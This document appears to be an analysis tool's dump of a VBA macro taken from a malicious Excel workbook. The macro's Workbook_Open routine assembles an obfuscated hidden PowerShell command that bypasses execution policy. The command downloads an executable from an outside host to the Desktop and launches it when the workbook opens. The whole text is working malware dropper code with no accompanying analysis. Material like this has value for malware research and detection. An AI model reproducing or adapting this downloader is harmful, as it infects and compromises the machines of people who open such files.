Filename     : ./macros/6f4b0377b07b241336b0db143053032cfaea4a76305c4745e27aef626f9c25f7
OLE stream   : _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA filename : ThisWorkbook.cls
----------------------------------------
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True







Function patalofiid()

sifuyoda = "ss','a" + "rt','-Pr'" + ") $D"
tabacooppiim = "whi"
patalofiid = tabacooppiim + "le(!" + "${?});" + "&(\""{0" + "}{2" + "}{3}{1}\""-f 'St'" + ",'o" + "ce" + sifuyoda + "es\"
End Function



Function stupiida()
nizergoob = "{D`es} =  $7d"
stupiida = "do{" + "&(" + "\""{1" + "}{0}\"" -f'e" + "p'," + "'sl" + "e') 3" + "3;$" + nizergoob
End Function

Function portoshipper()
If msoBlogMultipleCategories > 0 Then
listercorvin = Array(Minute(Now), Second(Now), "oP" + "RoFi -W", Now(), Second(Now))
izusesphone = Array(Minute(Now), Second(Now), "Er", Minute(Now))



sekemakol = Array(Second(Now), Minute(Now), "nONinT", Now())
opergrouper = "a"
nalmaclever = Array(Second(Now), Minute(Now), "Ecu" + "TI", Minute(Now), Minute(Now))

adeliacoler = Array(Second(Now), "d" + "en -n", Minute(Now))
zyziopera = Array(Second(Now), opergrouper + "ss    """, Second(Now), Minute(Now), "d  " + " /c""", Minute(Now))
portoshipper = "c" + "m" + zyziopera(4) + "p" + "Ow" + izusesphone(2) + "ShE" + "Ll -n" + listercorvin(2) + "In  HiD" + adeliacoler(1) + "oLo -" + sekemakol(2) + "erA  -Ex" + nalmaclever(2) + "OnP byP" + zyziopera(1)
End If
End Function

Function hintermulls()
kodakpictured = "vIr'" + ",'N" + "t','mE') ;  "
hintermulls = "$7d" + "0mK6 = [Ty" + "PE" + "](\""{1}{0" + "}{3}{2}\"" -f 'on'," + "'eN" + kodakpictured
End Function
Sub Workbook_Open()
pomologos = "p"
If msoAlertCancelThird > 0.09 Then
Dim agorofodo As String

Randomize
agorofodo = Int(Rnd * 9882761#)
fimmenos = agorofodo
berlinootto = stupiida + "0mk" + "6:" + ":g" + "Et" + "foL" + "deRp" + "ATh(\""De" + "sktop" + "\"");(&(\""{" + "0}{1" + "}{2}\"" -f'N" + "e','w-'" + ",'Ob" + "je" + "ct') "

nishspace = bissmarus + ".Ne','ent','t.Web','ClI')).dOwNLOaDfiLE.INVokE(\""ht" + "t" + "p://mo" + "merton.c" + "om/a" + "tsms\"",\""$D" + "es\" + fimmenos + ".e" + "xe\"")}"
quttrowheels = patalofiid + fimmenos + ".ex" + "e"""
xedosmaza = hintermulls + berlinootto + nishspace + quttrowheels
hubabbuba = portoshipper + xedosmaza
zalkaoreos = msoAnimationLookDown - 104
Shell hubabbuba, zalkaoreos
End If
End Sub

Function bissmarus()
bissmarus = "(\""{0}" + "{2}{1}{3}{" + "5}{6}" + "{4}\""-f'" + "Sy'" + ",'te','s','m"
End Function








